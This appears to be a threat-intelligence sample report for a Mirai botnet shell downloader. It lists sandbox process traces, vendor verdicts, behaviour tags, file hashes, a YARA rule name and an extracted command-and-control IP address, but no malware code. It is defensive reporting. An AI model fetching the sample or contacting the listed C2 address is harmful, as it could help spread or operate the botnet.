pid=5314->guuid=27d5c41d-1f00-0000-1e91-1359c3140000 pid=5315 execve guuid=8d4bad1e-1f00-0000-1e91-1359c5140000 pid=5317 /tmp/morte.x86_64 dns net send-data guuid=d92f8a1d-1f00-0000-1e91-1359c2140000 pid=5314->guuid=8d4bad1e-1f00-0000-1e91-1359c5140000 pid=5317 clone guuid=d7daf11d-1f00-0000-1e91-1359c4140000 pid=5316 /usr/bin/cp guuid=27d5c41d-1f00-0000-1e91-1359c3140000 pid=5315->guuid=d7daf11d-1f00-0000-1e91-1359c4140000 pid=5316 execve guuid=8d4bad1e-1f00-0000-1e91-1359c5140000 pid=5317->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 775B guuid=8d4bad1e-1f00-0000-1e91-1359c5140000 pid=5317->310a0ed0-c544-54ca-bf3f-fca55e459297 con guuid=ff19821d-2000-0000-1e91-1359cd140000 pid=5325->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 2325B guuid=ff19821d-2000-0000-1e91-1359cd140000 pid=5325->310a0ed0-c544-54ca-bf3f-fca55e459297 send: 2B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5
Threat name:
Linux.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2025-10-03 04:15:55 UTC
File Type:
Text (Shell)
AV detection:
12 of 36 (33.33%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=2uj6sks3q5dxt75edx2qr4cuaofvedhqlulzij6s7wcl3jowsxkq._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai antivm botnet credential_access defense_evasion discovery execution linux persistence
Link:
https://tria.ge/reports/251003-etpljaw1fx/
Behaviour
Command and Scripting Interpreter: Unix Shell
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads system network configuration
Reads process memory
Enumerates active TCP sockets
Enumerates running processes
Modifies init.d
Modifies rc script
File and Directory Permissions Modification
Executes dropped EXE
Mirai
Mirai family
Malware Config
C2 Extraction:
157.20.32.209
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/d513e92a5b87/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.39
Link:
https://yomi.yoroi.company/submissions/d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5

(this sample)

Mirai

elf 1981656374364ddf88987622b3b1a75cced37e7bcf4bf23cf994dfda818fa80e

  
URLhaus
https://urlhaus.abuse.ch/url/3632060/
  
Delivery method
Distributed via web download
  
Dropping
MD5 de871c5af41177ea446c86a30b0e874f
  
Dropping
SHA256 1981656374364ddf88987622b3b1a75cced37e7bcf4bf23cf994dfda818fa80e

Comments